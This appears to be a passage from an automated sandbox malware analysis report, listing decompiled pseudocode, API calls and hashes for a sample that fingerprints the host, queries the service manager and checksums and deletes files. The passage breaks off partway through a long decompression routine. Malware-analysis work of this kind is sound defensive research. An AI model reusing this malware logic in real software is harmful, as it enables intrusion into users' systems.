                  Uniqueness

                  Uniqueness Score: 100.00%

                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID: C:\Windows\system32
                  • API String ID: 1514166925-2896066436
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.19%

                  C-Code - Quality: 94%
                  			E0040C78F(void* __ebx, void* __edx, void* __edi) {
                  				void* __ecx;
                  				intOrPtr _t6;
                  				intOrPtr _t7;
                  				signed int _t10;
                  				void* _t15;
                  				signed int _t21;
                  				signed int _t23;
                  				void* _t24;
                  				void* _t25;
                  				void* _t29;
                  				void* _t32;
                  				void* _t34;
                  
                  				_t34 = __edx;
                  				_t6 =  *0x415484; // 0x0
                  				_t7 = _t6;
                  				if(_t7 == 0) {
                  					E0040632A(__eflags); // executed
                  					E004076C6(__eflags); // executed
                  					_t10 = E0040F92D(__ebx, _t29, _t34, __edi, __eflags);
                  					__eflags = _t10;
                  					if(_t10 != 0) {
                  						goto L12;
                  					} else {
                  						 *0x415484 = 1;
                  						goto L11;
                  					}
                  				} else {
                  					_t15 = _t7 - 1;
                  					if(_t15 == 0) {
                  						E00408922(__eflags); // executed
                  						E00408CD5(__eflags); // executed
                  						E00409BFD(__eflags);
                  						E0040A2C9(__eflags); // executed
                  						E0040B6B5(__eflags); // executed
                  						_push(_t29);
                  						_t21 = E004060C5();
                  						_t32 = _t29;
                  						__eflags = _t21;
                  						if(_t21 == 0) {
                  							L12:
                  							 *0x415484 = 3;
                  							goto L13;
                  						} else {
                  							_push(_t32);
                  							_t23 = E0040FCD8(E0040FA9B());
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								goto L12;
                  							} else {
                  								 *0x415484 = 2;
                  								L11:
                  								_t2 = GetTickCount() % 0xfa0;
                  								__eflags = _t2;
                  								return 0xfa0 + _t2;
                  							}
                  						}
                  					} else {
                  						_t24 = _t15 - 1;
                  						if(_t24 == 0) {
                  							 *0x415484 = 2; // executed
                  							_t25 = E0040C682(__edi, __eflags); // executed
                  							return _t25; // executed
                  						} else {
                  							if(_t24 == 1) {
                  								SetEvent( *0x414e6c);
                  							}
                  							L13:
                  							return 0;
                  						}
                  					}
                  				}
                  			}
















                  APIs
                  • SetEvent.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C7AD
                  • GetTickCount.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C82C
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountEventTick
                  • String ID:
                  • API String ID: 180926312-0
                  • Opcode ID: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction ID: be868de2910ec1a5e810c43775452dbe779e15a4cf7b5af956ef61f3f0da2497
                  • Opcode Fuzzy Hash: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction Fuzzy Hash: 3D0196B1514502C9E7147BB5A94A3AB3658AB8031EF10C23FA402B56D3EF3D8454952E
                  Uniqueness

                  Uniqueness Score: 2.98%

                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                  				intOrPtr _t1;
                  				int _t9;
                  				intOrPtr _t16;
                  				void* _t20;
                  				void* _t24;
                  
                  				_t24 = __eflags;
                  				_t20 = __edx;
                  				_t16 = __ecx;
                  				_t1 =  *0x415488; // 0x3c4e0000
                  				 *0x4164e0 = _t1;
                  				E0040F16B();
                  				E0040F149();
                  				E0040F26C();
                  				E0040F292();
                  				E0040F3C5(); // executed
                  				E0040F43E(__ebx); // executed
                  				E0040F2EE(_t24); // executed
                  				_t9 = lstrcmpiW(0x416c50, 0x416840);
                  				if(_t9 != 0) {
                  					E0040F63A(_t16, _t20, __edi, __eflags);
                  					__eflags =  *0x415f4c;
                  					if( *0x415f4c == 0) {
                  						__eflags = 0;
                  						E00401CC2(0x416840, 0, _t16, 0);
                  					} else {
                  						E0040F7A0();
                  					}
                  					__eflags = 1;
                  					return 1;
                  				} else {
                  					return _t9;
                  				}
                  			}









                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,00416C50,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNEL32(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(00416C50,00416840,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteManagerMappingModuleMultiOpenServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: @hA
                  • API String ID: 260064074-589612155
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040C493() {
                  				short _v524;
                  				int _t7;
                  				intOrPtr* _t8;
                  				int _t10;
                  
                  				_t7 = GetWindowsDirectoryW( &_v524, 0x104);
                  				if(_t7 != 0) {
                  					_t8 =  &_v524;
                  					if(_v524 == 0) {
                  						L6:
                  						_t10 = GetVolumeInformationW( &_v524, 0, 0, 0x415488, 0, 0, 0, 0); // executed
                  						return _t10;
                  					}
                  					while( *_t8 != 0x5c) {
                  						_t8 = _t8 + 2;
                  						if( *_t8 != 0) {
                  							continue;
                  						}
                  						goto L6;
                  					}
                  					 *((short*)(_t8 + 2)) = 0;
                  					goto L6;
                  				}
                  				return _t7;
                  			}








                  APIs
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                  • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: DirectoryInformationVolumeWindows
                  • String ID:
                  • API String ID: 3487004747-0
                  • Opcode ID: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction ID: 6df482a4064c3c314c9bc21c7ed919fd71dc62a834def3a9c54a892a1779e89a
                  • Opcode Fuzzy Hash: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction Fuzzy Hash: 41F0B461840304EADB60AB609C99EF7727CFB90701F04C2BBE446A31A0EA748EC04669
                  Uniqueness

                  Uniqueness Score: 0.11%

                  APIs
                  • RtlGetVersion.NTDLL(?), ref: 004023B2
                  • GetNativeSystemInfo.KERNEL32(?), ref: 004023BC
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoNativeSystemVersion
                  • String ID:
                  • API String ID: 2296905803-0
                  • Opcode ID: f500d454982887d195b2059825262a2c8c9dbe5e898991a128f4e8882e8388d5
                  • Instruction ID: a371f979de9dee7b635f4db02bf44c25b34ee49e7ea891550d89514103cf8198
                  • Opcode Fuzzy Hash: f500d454982887d195b2059825262a2c8c9dbe5e898991a128f4e8882e8388d5
                  • Instruction Fuzzy Hash: 0BE0EDB2D0421D8BCB14DB62ED4AADCBBFCEB68305F0401F1E909FA151E734DB548A64
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 100%
                  			E0040F16B() {
                  				void* _t1;
                  				int _t2;
                  
                  				_t1 = OpenSCManagerW(0, 0, 0xf003f); // executed
                  				if(_t1 != 0) {
                  					 *0x415f4c = 1; // executed
                  					_t2 = CloseServiceHandle(_t1); // executed
                  					return _t2;
                  				}
                  				return _t1;
                  			}






                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                  • CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleManagerOpenService
                  • String ID:
                  • API String ID: 1199824460-0
                  • Opcode ID: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction ID: 2df2e35fa660732f6bf37a98dc022a26ca5b34ae0ab37706f3e31856a2e9695e
                  • Opcode Fuzzy Hash: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction Fuzzy Hash: 36C04CB0340301AEEB749F51DE09BA53998AB44B42F008074A60DE95D5CBF44406DA2D
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 16%
                  			E00401345() {
                  				char _v8;
                  				char _v1032;
                  				void* _t7;
                  
                  				_v8 = 0x400;
                  				_t7 =  *0x415414(0,  &_v1032,  &_v8); // executed
                  				if(_t7 < 0) {
                  					return 0;
                  				}
                  				_push(_t10);
                  				return E004023E5( &_v1032);
                  			}







                  APIs
                  • ObtainUserAgentString.URLMON(00000000,?,00000104), ref: 00401362
                    • Part of subcall function 004023E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,0040C6FC,00000000,00000000,00401379), ref: 004023F5
                    • Part of subcall function 004023E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00402418
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$AgentObtainStringUser
                  • String ID:
                  • API String ID: 1410626495-0
                  • Opcode ID: be19bc15010d0741be8f0ae2a0f914217170398782f3269a69305a203e6730c8
                  • Instruction ID: c7da917df9b89f1375c758ecb66f70f82b522fe01f28cd91f55593c37db2b19c
                  • Opcode Fuzzy Hash: be19bc15010d0741be8f0ae2a0f914217170398782f3269a69305a203e6730c8
                  • Instruction Fuzzy Hash: 90E086F1514118ABE710EB60DE46FDA73BC9B40305F1041BAAF18F10D1F6746A0945AD
                  Uniqueness

                  Uniqueness Score: 0.05%

                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID:
                  • API String ID: 1514166925-0
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Non-executed Functions

                  C-Code - Quality: 99%
                  			E00404AD4(int* __ecx, void* __edx, signed int _a4, intOrPtr _a8, signed char* _a12, signed int* _a16, signed int _a20) {
                  				signed int _v8;
                  				signed int _v12;
                  				void* _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				void* _v32;
                  				void* _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				signed int _v48;
                  				signed int _v52;
                  				signed char _v56;
                  				intOrPtr _v60;
                  				int* _v64;
                  				signed int _v68;
                  				int _v72;
                  				void* _v76;
                  				intOrPtr _v80;
                  				signed int _v144;
                  				signed int _v148;
                  				void _v212;
                  				signed int _t759;
                  				signed int* _t763;
                  				void* _t764;
                  				signed int _t769;
                  				signed int _t770;
                  				intOrPtr _t771;
                  				int _t772;
                  				signed int _t774;
                  				void* _t775;
                  				signed int _t782;
                  				void* _t785;
                  				signed int* _t786;
                  				void* _t792;
                  				intOrPtr _t795;
                  				signed char* _t813;
                  				intOrPtr _t815;
                  				void* _t816;
                  				signed int _t819;
                  				intOrPtr _t822;
                  				signed int _t823;
                  				signed int _t828;
                  				signed int _t830;
                  				signed int _t834;
                  				unsigned int _t836;
                  				signed int _t837;
                  				signed int _t841;
                  				unsigned int _t843;
                  				signed int _t846;
                  				signed int _t849;
                  				unsigned int _t850;
                  				signed int _t852;
                  				signed char _t853;
                  				signed int _t855;
                  				signed int _t864;
                  				signed int _t865;
                  				signed int _t868;
                  				signed int _t872;
                  				signed int _t873;
                  				signed int _t874;
                  				void* _t875;
                  				signed int _t879;
                  				signed int _t883;
                  				signed int _t884;
                  				signed int _t885;
                  				signed int _t889;
                  				char _t890;
                  				signed int _t894;
                  				signed int _t900;
                  				signed int _t902;
                  				signed char _t908;
                  				signed int _t910;
                  				signed int _t913;
                  				signed int _t915;
                  				signed int _t919;
                  				signed int _t920;
                  				signed int _t922;
                  				signed int _t926;
                  				signed int _t934;
                  				intOrPtr _t937;
                  				signed int _t939;
                  				signed int _t941;
                  				signed int _t948;
                  				signed int _t960;
                  				signed int _t962;
                  				signed char _t968;
                  				signed int _t970;
                  				signed int _t972;
                  				intOrPtr _t988;
                  				signed int _t989;
                  				void* _t999;
                  				signed int _t1004;
                  				signed int _t1008;
                  				signed int _t1009;
                  				signed int _t1011;
                  				signed int _t1014;
                  				signed int _t1019;
                  				signed int _t1029;
                  				signed int _t1031;
                  				signed char _t1037;
                  				signed int _t1039;
                  				signed int _t1041;
                  				signed int _t1044;
                  				signed int _t1046;
                  				signed int _t1051;
                  				signed int _t1060;
                  				signed int _t1066;
                  				int _t1067;
                  				signed int _t1075;
                  				signed int _t1077;
                  				signed int _t1078;
                  				signed int _t1079;
                  				signed int _t1080;
                  				signed int _t1082;
                  				signed int _t1083;
                  				signed int _t1084;
                  				signed int _t1085;
                  				signed int _t1087;
                  				signed int _t1088;
                  				signed int _t1090;
                  				signed int _t1091;
                  				signed int _t1093;
                  				signed int _t1094;
                  				signed int _t1095;
                  				signed int _t1096;
                  				signed int _t1112;
                  				signed int _t1113;
                  				void* _t1114;
                  				intOrPtr _t1115;
                  				signed char* _t1116;
                  				signed int _t1117;
                  				signed int _t1118;
                  				signed int _t1119;
                  				signed int _t1121;
                  				signed int _t1123;
                  				signed int _t1124;
                  				signed int _t1126;
                  				signed int _t1127;
                  				signed char _t1128;
                  				signed int _t1135;
                  				signed int _t1137;
                  				signed int _t1138;
                  				signed int* _t1139;
                  				signed int _t1141;
                  				unsigned int _t1145;
                  				signed int _t1146;
                  				void* _t1157;
                  				void* _t1158;
                  				signed char _t1161;
                  				signed int _t1163;
                  				void* _t1164;
                  				signed int _t1165;
                  				signed int _t1166;
                  				signed char _t1169;
                  				unsigned int _t1170;
                  				signed char _t1176;
                  				signed int _t1177;
                  				signed int _t1185;
                  				signed int* _t1187;
                  				signed int _t1191;
                  				signed char _t1194;
                  				signed int _t1195;
                  				void* _t1197;
                  				signed int _t1198;
                  				signed int _t1199;
                  				signed char _t1200;
                  				signed int _t1201;
                  				signed int _t1202;
                  				signed char _t1203;
                  				int _t1205;
                  				intOrPtr* _t1208;
                  				signed char _t1216;
                  				signed int _t1219;
                  				signed int* _t1221;
                  				signed int _t1222;
                  				signed char _t1229;
                  				signed int _t1232;
                  				signed char _t1233;
                  				signed char _t1234;
                  				void* _t1239;
                  				void* _t1244;
                  				intOrPtr _t1245;
                  				signed int _t1247;
                  				signed int _t1248;
                  				signed int _t1249;
                  				signed int _t1250;
                  				signed char _t1251;
                  				int _t1253;
                  				signed int _t1256;
                  				signed char _t1263;
                  				signed int _t1266;
                  				signed int _t1267;
                  				signed char _t1270;
                  				signed char _t1271;
                  				signed int _t1274;
                  				void* _t1275;
                  				signed int _t1277;
                  				signed int _t1279;
                  				void* _t1288;
                  				signed int _t1291;
                  				void* _t1296;
                  				signed int _t1299;
                  				signed int _t1301;
                  				int* _t1302;
                  				unsigned int _t1303;
                  				signed int _t1304;
                  				void* _t1305;
                  				int _t1310;
                  				signed int _t1315;
                  				signed int _t1317;
                  				signed int _t1320;
                  				unsigned int _t1321;
                  				char* _t1322;
                  				signed int _t1326;
                  				int* _t1350;
                  				signed int _t1351;
                  				signed int* _t1352;
                  				signed int _t1355;
                  				signed int _t1358;
                  				intOrPtr _t1359;
                  				void* _t1363;
                  				signed int _t1364;
                  				signed int _t1365;
                  				void* _t1366;
                  				void* _t1367;
                  				void* _t1368;
                  				void* _t1369;
                  				void* _t1370;
                  				void* _t1371;
                  				void* _t1372;
                  				signed int _t1373;
                  				int _t1374;
                  				signed int _t1375;
                  				int* _t1376;
                  				void* _t1377;
                  				void* _t1378;
                  				void* _t1379;
                  				void* _t1384;
                  				void* _t1385;
                  
                  				_t1288 = __edx;
                  				_v16 = __edx;
                  				_t1113 = _t1112 | 0xffffffff;
                  				_v76 = __edx;
                  				_t1363 = _a12;
                  				_v36 =  *_a4 + __edx;
                  				_t1350 = __ecx;
                  				_v20 = _t1113;
                  				_v64 = __ecx;
                  				_t759 =  *_a16;
                  				_v32 = _t1363;
                  				_v60 = _t759 + _t1363;
                  				_t1135 = _a20 & 0x00000004;
                  				_v52 = _t1135;
                  				if(_t1135 == 0) {
                  					_t16 = _t1363 - 1; // 0x7
                  					_t1137 = _t16 + _t759 - _a8;
                  					__eflags = _t1137;
                  					_v68 = _t1137;
                  				} else {
                  					_t1137 = _t1113;
                  					_v68 = _t1113;
                  				}
                  				_t18 = _t1137 + 1; // 0x8
                  				if((_t1137 & _t18) != 0 || _t1363 < _a8) {
                  					 *_a16 =  *_a16 & 0x00000000;
                  					_t763 = _a4;
                  					 *_t763 =  *_t763 & 0x00000000;
                  					__eflags =  *_t763;
                  					_t764 = 0xfffffffd;
                  					return _t764;
                  				} else {
                  					_v28 = _v28 & 0x00000000;
                  					_t1364 = _t1350[1];
                  					_t1138 = _t1350[9];
                  					_v8 = _t1350[0xe];
                  					_v44 = _t1350[8];
                  					_v56 = _t1350[0xa];
                  					_v72 = _t1350[0xf];
                  					_t769 =  *_t1350;
                  					_v48 = _t1364;
                  					_v12 = _t1138;
                  					_v24 = 1;
                  					_v80 = 0x90;
                  					_t1384 = _t769 - 0x18;
                  					if(_t1384 > 0) {
                  						__eflags = _t769 - 0x25;
                  						if(__eflags > 0) {
                  							_t770 = _t769 - 0x26;
                  							__eflags = _t770;
                  							if(_t770 == 0) {
                  								_t1139 = _v32;
                  								_t771 = _v60;
                  								L59:
                  								__eflags = _t1288 - _v36;
                  								if(_t1288 >= _v36) {
                  									 *_t1350 = 0x26;
                  									L335:
                  									_t772 = _v24;
                  									L336:
                  									_t1114 = 0xfffffffc;
                  									_t1113 =  !=  ? _t772 : _t1114;
                  									L337:
                  									_v20 = _t1113;
                  									if(_t1113 == _t772 || _t1113 == 0xfffffffc) {
                  										L343:
                  										_t1350[1] = _t1364;
                  										asm("bts ecx, esi");
                  										_t774 =  >=  ? 0 : 0;
                  										_t1141 = 0 ^ _t774;
                  										_t775 =  >=  ? _t1141 : _t774;
                  										_t1350[8] = _v44;
                  										_t1350[9] = _v12;
                  										_t1350[0xa] = _v56;
                  										_t1350[0xf] = _v72;
                  										_t1350[0xe] = _t1141 - 0x00000001 & _v8;
                  										 *_a4 = _t1288 - _v76;
                  										_t782 = _v32 - _a12;
                  										_v32 = _t782;
                  										 *_a16 = _t782;
                  										if((_a20 & 0x00000009) == 0 || _t1113 < 0) {
                  											L360:
                  											return _t1113;
                  										} else {
                  											_a4 = 0x15b0;
                  											_t1291 = _t782 % _a4;
                  											_t1145 = _t1350[7];
                  											_t1365 = _t1145 & 0x0000ffff;
                  											_t1146 = _t1145 >> 0x10;
                  											_v68 = _t1291;
                  											if(_v32 == 0) {
                  												L357:
                  												_t1350[7] = (_t1146 << 0x10) + _t1365;
                  												if(_t1113 == 0 && (_a20 & 0x00000001) != 0) {
                  													_t785 = 0xfffffffe;
                  													_t1113 =  !=  ? _t785 : _t1113;
                  												}
                  												goto L360;
                  											}
                  											_t1351 = 0xfff1;
                  											do {
                  												_t786 = 0;
                  												_a16 = 0;
                  												if(_t1291 <= 7) {
                  													L351:
                  													if(_t786 >= _t1291) {
                  														goto L355;
                  													}
                  													_t1116 = _a12;
                  													_t1296 = _t1291 - _t786;
                  													do {
                  														_t1365 = _t1365 + ( *_t1116 & 0x000000ff);
                  														_t1116 =  &(_t1116[1]);
                  														_t1146 = _t1146 + _t1365;
                  														_t1296 = _t1296 - 1;
                  													} while (_t1296 != 0);
                  													_a12 = _t1116;
                  													goto L355;
                  												}
                  												_t1352 = _a16;
                  												_push(7);
                  												_t795 = 0 - _a12;
                  												_v80 = _t795;
                  												_t1115 = _t795;
                  												do {
                  													_t1352 =  &(_t1352[2]);
                  													_t1366 = _t1365 + ( *_a12 & 0x000000ff);
                  													_t1367 = _t1366 + (_a12[1] & 0x000000ff);
                  													_t1368 = _t1367 + (_a12[2] & 0x000000ff);
                  													_t1369 = _t1368 + (_a12[3] & 0x000000ff);
                  													_t1370 = _t1369 + (_a12[4] & 0x000000ff);
                  													_t1371 = _t1370 + (_a12[5] & 0x000000ff);
                  													_t1372 = _t1371 + (_a12[6] & 0x000000ff);
                  													_t1365 = _t1372 + (_a12[7] & 0x000000ff);
                  													_t813 =  &(_a12[8]);
                  													_t1146 = _t1146 + _t1366 + _t1367 + _t1368 + _t1369 + _t1370 + _t1371 + _t1372 + _t1365;
                  													_a12 = _t813;
                  												} while ( &(_t813[_t1115]) < _t1291);
                  												_a16 = _t1352;
                  												_t786 = _t1352;
                  												_t1351 = 0xfff1;
                  												goto L351;
                  												L355:
                  												_t1365 = _t1365 % _t1351;
                  												_t792 = _v32 - _v68;
                  												_t1146 = _t1146 % _t1351;
                  												_t1291 = _a4;
                  												_v32 = _t792;
                  												_v68 = _t1291;
                  											} while (_t792 != 0);
                  											_t1113 = _v20;
                  											_t1350 = _v64;
                  											goto L357;
                  										}
                  									} else {
                  										L339:
                  										_t815 = _v76;
                  										while(_t1288 > _t815) {
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												goto L343;
                  											}
                  											_t1288 = _t1288 - 1;
                  											_t1364 = _t1364 - 8;
                  											__eflags = _t1364;
                  										}
                  										goto L343;
                  									}
                  								}
                  								_t1373 = _v12;
                  								_t816 = _t771 - _t1139;
                  								_t1157 = _v36 - _t1288;
                  								__eflags = _t816 - _t1157;
                  								_t1158 =  <  ? _t816 : _t1157;
                  								__eflags = _t1158 - _t1373;
                  								_t1374 =  <  ? _t1158 : _t1373;
                  								memcpy(_v32, _t1288, _t1374);
                  								_t1379 = _t1379 + 0xc;
                  								_t1288 = _v16 + _t1374;
                  								_t1139 = _v32 + _t1374;
                  								_t819 = _v12 - _t1374;
                  								__eflags = _t819;
                  								_v16 = _t1288;
                  								_t1364 = _v48;
                  								_v32 = _t1139;
                  								_v12 = _t819;
                  								L61:
                  								__eflags = _t819;
                  								if(_t819 != 0) {
                  									L279:
                  									_t771 = _v60;
                  									__eflags = _t1139 - _t771;
                  									if(_t1139 < _t771) {
                  										goto L59;
                  									}
                  									_t1113 = 2;
                  									_v20 = _t1113;
                  									 *_t1350 = 9;
                  									goto L339;
                  								}
                  								L62:
                  								__eflags = _t1350[5] & 0x00000001;
                  								if((_t1350[5] & 0x00000001) != 0) {
                  									__eflags = _t1364 - (_t1364 & 0x00000007);
                  									if(_t1364 >= (_t1364 & 0x00000007)) {
                  										_t1117 = _v8;
                  										L311:
                  										_t822 = _v76;
                  										_t1161 = _t1364 & 0x00000007;
                  										_t1118 = _t1117 >> _t1161;
                  										_t1364 = _t1364 - _t1161;
                  										__eflags = _t1288 - _t822;
                  										if(_t1288 <= _t822) {
                  											L315:
                  											_t823 = _t1364;
                  											asm("bts edx, eax");
                  											__eflags = _t823 - 0x20;
                  											_t1163 =  >=  ? 0 : 0;
                  											_t1299 = 0 ^ _t1163;
                  											__eflags = _t823 - 0x40;
                  											_t1164 =  >=  ? _t1299 : _t1163;
                  											_t1119 = _t1118 & _t1299 - 0x00000001;
                  											__eflags = _a20 & 0x00000001;
                  											_v8 = _t1119;
                  											if((_a20 & 0x00000001) == 0) {
                  												L332:
                  												_t1288 = _v16;
                  												L333:
                  												_t1113 = 0;
                  												 *_t1350 = 0x22;
                  												L18:
                  												_t772 = _v24;
                  												goto L337;
                  											}
                  											_t1165 = 0;
                  											__eflags = 0;
                  											L317:
                  											_v12 = _t1165;
                  											__eflags = _t1165 - 4;
                  											if(_t1165 >= 4) {
                  												goto L332;
                  											}
                  											__eflags = _t1364;
                  											if(_t1364 == 0) {
                  												_t1288 = _v16;
                  												L327:
                  												__eflags = _t1288 - _v36;
                  												if(_t1288 >= _v36) {
                  													 *_t1350 = 0x2a;
                  													goto L335;
                  												}
                  												_t1166 =  *_t1288 & 0x000000ff;
                  												_t1301 = _t1288 + 1;
                  												__eflags = _t1301;
                  												_v16 = _t1301;
                  												L329:
                  												_t1350[4] = _t1350[4] << 0x00000008 | _t1166;
                  												_t1165 = _v12 + 1;
                  												goto L317;
